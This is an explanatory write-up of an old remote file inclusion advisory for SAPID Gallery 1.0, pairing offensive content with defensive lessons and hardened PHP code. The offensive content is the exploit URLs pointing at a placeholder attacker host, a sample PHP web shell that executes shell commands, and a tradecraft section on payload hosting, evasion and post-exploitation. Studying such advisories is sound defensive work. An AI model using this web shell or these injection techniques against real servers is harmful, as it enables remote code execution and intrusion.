SAPID Gallery 1.0 'ROOT_PATH' Remote File Inclusion Explained

What this paper is
This advisory, published in August 2006 by Kacper (a.k.a. Rahim) of the DEVIL TEAM and archived by Exploit-DB as paper 2130, describes a Remote File Inclusion (RFI) vulnerability in SAPID Gallery version 1.0. The bug lets an unauthenticated attacker make the application include and execute an arbitrary PHP file fetched from a remote server, simply by supplying the root_path variable in the query string.
Simple technical breakdown
SAPID Gallery is a PHP web application. Two of its extension scripts, usr/extensions/get_calendar.inc.php and usr/extensions/get_tree.inc.php, build an include path from a variable named root_path, which is meant to hold the application's base directory and to be set by whichever script includes them. The .inc.php files can be requested directly, however, and nothing initialises or validates root_path before it is used.
The advisory reproduces no source code, so the exact include statement is not known, but the two exploit URLs only work under the PHP configuration that was typical in 2006: with register_globals enabled, every query-string parameter becomes a global variable, so ?root_path=http://attacker.example/ sets $root_path for the script; the include/require then receives a URL instead of a local path, and with allow_url_fopen on, PHP fetches the remote file and executes it as PHP on the target. This is a classic Remote File Inclusion.
The advisory gives two ways to set the variable:
- injecting the remote URL directly through ?root_path=
- injecting it through ?GLOBALS[root_path]=, which writes into PHP's $GLOBALS superglobal array and so into the global root_path variable
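To make the mechanism concrete, here is an added PHP illustration; it is not SAPID Gallery's code, which the advisory does not reproduce. It emulates register_globals in a small function, models an include file of the assumed shape (expects a caller-supplied $root_path, appends a fixed filename), and shows what each advisory vector turns the include target into. The host attacker.example, the filename calendar.php and the emulation itself are assumptions.

```php
<?php
// Added illustration, not SAPID Gallery's source. Models why the two advisory
// URLs work when PHP's register_globals is on (PHP 4-era default, removed in 5.4).
declare(strict_types=1);

// Emulation of register_globals: every request parameter becomes a global
// variable. A parameter named GLOBALS[...] parses as an array and lands in the
// $GLOBALS superglobal itself, which is the advisory's second vector.
function registerGlobals(array $query): void
{
    foreach ($query as $name => $value) {
        if ($name === 'GLOBALS' && is_array($value)) {
            foreach ($value as $k => $v) {
                $GLOBALS[$k] = $v;
            }
        } else {
            $GLOBALS[$name] = $value;
        }
    }
}

// Assumed shape of get_calendar.inc.php: it expects its caller to have set
// $root_path and appends a fixed filename. The result would go to require().
function calendarIncludeTarget(): string
{
    global $root_path;                              // never initialised here
    return $root_path . '/usr/lib/calendar.php';    // assumed filename
}

// Runs one request's query string through the emulated pipeline and returns
// the string require() would receive, instead of executing it.
function includeTargetFor(string $queryString): string
{
    unset($GLOBALS['root_path']);        // fresh request: variable not set
    parse_str($queryString, $params);    // 'GLOBALS[root_path]=x' -> ['GLOBALS' => ['root_path' => 'x']]
    registerGlobals($params);
    return calendarIncludeTarget();
}

// Constructed sample requests (attacker.example is a placeholder host).
$cases = [
    'direct hit' => '',                                                 // no caller set it
    'vector 1'   => 'root_path=http://attacker.example/shell.txt?',
    'vector 2'   => 'GLOBALS[root_path]=http://attacker.example/shell.txt?',
];
foreach ($cases as $label => $qs) {
    printf("%-10s -> %s\n", $label, includeTargetFor($qs));
}
// The trailing '?' turns the appended '/usr/lib/calendar.php' into a query
// string for attacker.example, so the fetched URL still resolves to shell.txt.
// Under register_globals + allow_url_fopen, require() of that string fetched
// the file over HTTP and executed whatever PHP it contained.
```

Run it with the PHP CLI; the two exploit rows print the same remote URL, which is the whole point of the GLOBALS[...] form: it reaches the same variable by a second route.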
Complete code and payload walkthrough
The provided exploit paper contains only the exploit technique and examples, not actual code or shellcode. The "code" here refers to the exploit strings and the PHP code that would be hosted on the attacker's server.
Exploit Strings:
http://www.site.com/[sapidgalery_path]/usr/extensions/get_calendar.inc.php?root_path=[evil_scripts]
- http://www.site.com/: the target website.
- [sapidgalery_path]: placeholder for the directory where SAPID Gallery is installed on the target; the attacker needs to know it.
- /usr/extensions/get_calendar.inc.php: the vulnerable script, which uses root_path to build an include path.
- ?root_path=: start of the query string, carrying the root_path parameter.
- [evil_scripts]: placeholder for the URL of the attacker-hosted PHP script, which the target fetches and executes.
http://www.site.com/[sapidgalery_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]
- Same pattern, but against a second vulnerable file, get_tree.inc.php.
- ?GLOBALS[root_path]=: PHP parses bracketed parameter names as arrays, so this request carries an array parameter named GLOBALS with the key root_path. With register_globals on, that parameter is registered into the $GLOBALS superglobal, i.e. straight into the global root_path variable. The form mattered because it also reached scripts that tried to defend against register_globals by clearing the plain request variables; it was a bug in PHP's register_globals handling that PHP itself later fixed.
- [evil_scripts]: the attacker's remote script URL, as before.
Attacker's Remote Script ([evil_scripts]):
The paper does not provide the content of [evil_scripts]. However, for an RFI exploit, this would typically be a PHP file containing malicious code. A common example would be a simple web shell that allows the attacker to execute commands on the server.
Example of [evil_scripts] (Hypothetical Web Shell):
<?php
// This is a hypothetical web shell for demonstration purposes.
// In a real attack, this would be more sophisticated.
// Check if a command is provided
if (isset($_GET['cmd'])) {
    // No sanitisation on purpose: the operator's command is passed through verbatim
    $cmd = $_GET['cmd'];
    // Execute the command and output the result, HTML-escaped so the browser shows it as text
    echo "<pre>";
    echo htmlspecialchars((string) shell_exec($cmd));
    echo "</pre>";
} else {
    echo "<h1>SAPID Gallery RFI Payload</h1>";
    echo "<p>Send a 'cmd' parameter to execute commands.</p>";
    echo "<p>Example: ?cmd=ls -la</p>";
}
?>
Code Fragment/Block -> Practical Purpose Mapping:
- http://www.site.com/[sapidgalery_path]/usr/extensions/get_calendar.inc.php?root_path=[evil_scripts] -> Exploitation Vector 1: reaches the vulnerable file and sets root_path through the query string so that a remote script is included.
- http://www.site.com/[sapidgalery_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts] -> Exploitation Vector 2: sets root_path by writing into $GLOBALS, which also works against scripts that only clear the plain request variable.
- [evil_scripts] (as a URL) -> Payload Delivery Mechanism: points at the attacker-controlled server hosting the PHP source.
- Hypothetical [evil_scripts] PHP code -> Remote Code Execution: the code that actually runs on the victim's server once it has been included.
Practical details for offensive operations teams
- Required Access Level: Unauthenticated access to the target web application. The vulnerability is exposed via GET requests.
- Lab Preconditions:
  - A vulnerable instance of SAPID Gallery v1.0 on a PHP build with register_globals=On and allow_url_fopen=On (the PHP 4-era defaults; register_globals no longer exists in PHP 5.4 and later).
  - A web server reachable from the target to host the malicious PHP script ([evil_scripts]).
  - Knowledge of the target's IP/domain and the installation path of SAPID Gallery.
- Tooling Assumptions:
  - A web browser or curl for crafting and sending requests.
  - A simple HTTP server (Python's http.server, Apache, Nginx) to host the payload.
  - A text editor for creating the payload script.
  - Optionally, a vulnerability scanner or manual reconnaissance tools to identify [sapidgalery_path].
- Execution Pitfalls:
  - Incorrect [sapidgalery_path]: if the installation path is wrong, the request never reaches the vulnerable script.
  - Firewall/WAF blocking: egress filtering on the target can stop PHP from fetching [evil_scripts], and a WAF may recognise the http:// or GLOBALS[ pattern in the query string.
  - PHP configuration: both vectors need register_globals on; the remote fetch needs allow_url_fopen on and, from PHP 5.2 onward, allow_url_include on as well (Off by default). register_globals was removed in PHP 5.4, so the bug is unreachable on any supported PHP.
  - Payload URL format: the attacker's server must return the PHP source as plain text (commonly a .txt file) rather than execute it. If the vulnerable script appends its own filename after root_path, which is the usual pattern, the URL needs a trailing ? so that the appended part becomes a harmless query string.
  - Payload complexity: characters filtered by the target or a WAF can break the request; keep the remote file simple and do the work inside it.
- Tradecraft Considerations:
  - Reconnaissance: identifying [sapidgalery_path] accurately is crucial; directory brute-forcing or clues in the site's page source are the usual routes.
  - Payload Hosting: keep the payload server stable and reachable from the target, and prefer a domain that does not immediately raise suspicion.
  - Obfuscation (if needed): the payload may need obfuscation to evade signature-based WAF detection.
  - Post-Exploitation: once the payload runs, it executes as the web server user, which is the starting point for further access, data exfiltration or pivoting.
Where this was used and when
The advisory was published on 2006-08-07 on milw0rm and is archived as Exploit-DB paper 2130. SAPID Gallery was a SourceForge-hosted PHP application at the time. Remote file inclusion was among the most common PHP bug classes of the mid-2000s, a product of register_globals and allow_url_fopen defaults combined with unvalidated include paths, and such bugs were routinely mass-scanned by automated tools. The page itself offers no evidence about exploitation of this particular bug in the wild.
Defensive lessons for modern teams
- Input Validation is Paramount: never let request data reach include/require. Select included files from a fixed allow-list keyed by a short identifier rather than by a path or URL.
- PHP Configuration: register_globals was removed in PHP 5.4; on anything older, set it Off. Remote includes are gated by allow_url_include (Off by default since PHP 5.2); keep it Off, and disable allow_url_fopen too if nothing needs URL streams.
- Confine Resolved Paths: when a path must be computed, resolve it with realpath() and require it to start with the trusted base directory; basename() strips directory components but does not by itself guarantee the file is the expected one.
- Guard Include Files: scripts meant only to be included should refuse direct requests (for example by checking a constant the front controller defines), which removes the entry point used here.
- Web Application Firewalls (WAFs): a WAF can flag query parameters carrying http:// or GLOBALS[ as RFI attempts, but treat that as detection, not as the fix.
- Regular Patching and Updates: keep web applications and their dependencies on supported versions. SAPID Gallery v1.0 is ancient and unsupported.
- Least Privilege: run web server processes with the minimum necessary privileges, so that an included shell gains as little as possible.
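The code side of those lessons, as an added PHP example rather than any patch the project shipped: the assumed vulnerable include pattern beside a hardened replacement that derives nothing from request data, allow-lists component names, confines the resolved file with realpath(), and refuses direct requests. The directory layout, the component names and the IN_SAPID marker are assumptions.

```php
<?php
// Added example, not SAPID Gallery's code. The directory layout, the IN_SAPID
// marker and the component names are assumptions for illustration.
// Configuration side (php.ini): register_globals does not exist in PHP >= 5.4;
// allow_url_include = Off (default since 5.2) blocks remote includes outright.
declare(strict_types=1);

// VULNERABLE (assumed shape of the original include file): the base path is a
// global the file never sets, so under register_globals it is attacker data,
// and a URL in it becomes a remote require().
function vulnerableIncludeTarget(string $rootPathFromGlobal, string $component): string
{
    return $rootPathFromGlobal . '/usr/lib/' . $component . '.php';
}

// HARDENED: the base comes from the caller's constant, the component must be
// on an allow-list, and the resolved file must stay under the library directory.
const ALLOWED_COMPONENTS = ['calendar', 'tree'];

function safeIncludeTarget(string $appBase, string $component): ?string
{
    if (!in_array($component, ALLOWED_COMPONENTS, true)) {
        return null;                                   // unknown name: refuse
    }
    $libDir    = realpath($appBase . '/usr/lib');
    $candidate = realpath($appBase . '/usr/lib/' . $component . '.php');
    if ($libDir === false || $candidate === false) {
        return null;                                   // missing file; a URL never resolves
    }
    // realpath() has removed '..' and symlinks; now insist on the directory prefix.
    if (strncmp($candidate, $libDir . DIRECTORY_SEPARATOR, strlen($libDir) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Direct-request guard an include file should carry: the front controller
// defines IN_SAPID before including it; a bare GET to the .inc.php stops here.
function isDirectRequest(): bool
{
    return !defined('IN_SAPID');
}

// Constructed demo: build a throwaway tree and probe both functions.
$base = sys_get_temp_dir() . '/sapid_demo_' . getmypid();
mkdir($base . '/usr/lib', 0700, true);
file_put_contents($base . '/usr/lib/calendar.php', "<?php // stub\n");

printf("vulnerable, root_path from query -> %s\n",
    vulnerableIncludeTarget('http://attacker.example/shell.txt?', 'calendar'));

$probes = ['calendar', 'tree', '../../../../etc/passwd', 'http://attacker.example/shell.txt?'];
foreach ($probes as $p) {
    printf("hardened %-36s -> %s\n", $p, var_export(safeIncludeTarget($base, $p), true));
}
printf("direct request to the .inc.php rejected -> %s\n", var_export(isDirectRequest(), true));

unlink($base . '/usr/lib/calendar.php');
rmdir($base . '/usr/lib');
rmdir($base . '/usr');
rmdir($base);
```

Only 'calendar' resolves; 'tree' is allowed by name but the stub file does not exist, so realpath() fails and the function declines rather than falling back to a guess. The traversal and URL probes never pass the allow-list, and realpath() would reject them anyway, which is the defence-in-depth point: the allow-list is the control, the path confinement catches mistakes in it.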
ASCII visual (if applicable)
+-------------------+        +----------------------+        +---------------------+
| Attacker server   |        | Target web server    |  1.    | Attacker's browser  |
| (hosts shell.txt) |        | (SAPID Gallery v1.0) |<-------| (sends crafted URL) |
+-------------------+        +----------------------+        +---------------------+
          ^                            |
          |  2. include() fetches       |  1. GET .../get_calendar.inc.php?root_path=http://attacker.example/shell.txt?
          |     shell.txt over HTTP     |     (or .../get_tree.inc.php?GLOBALS[root_path]=...)
          |     (allow_url_fopen on)    |
          +-----------------------------+
                                       |
                                       |  3. the fetched PHP runs as the web server user;
                                       |     its output goes back to the attacker's browser
Source references
- Paper: SAPID Gallery 1.0 - 'ROOT_PATH' Remote File Inclusion
- Author: Kacper
- Published: 2006-08-07
- Exploit-DB ID: 2130
- URL: https://www.exploit-db.com/papers/2130
- Script Site: http://sapid.sourceforge.net/ (Note: This link may no longer be active or point to the original software)
Original Exploit-DB Content (Verbatim)
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ SAPID Gallery <= v.1 (root_path) Remote File Include Vulnerability
$$ Script site: http://sapid.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:
http://www.site.com/[sapidgalery_path]/usr/extensions/get_calendar.inc.php?root_path=[evil_scripts]
http://www.site.com/[sapidgalery_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]
#Pozdro dla wszystkich ;-)  [Polish: "Greetings to everyone ;-)"]
# milw0rm.com [2006-08-07]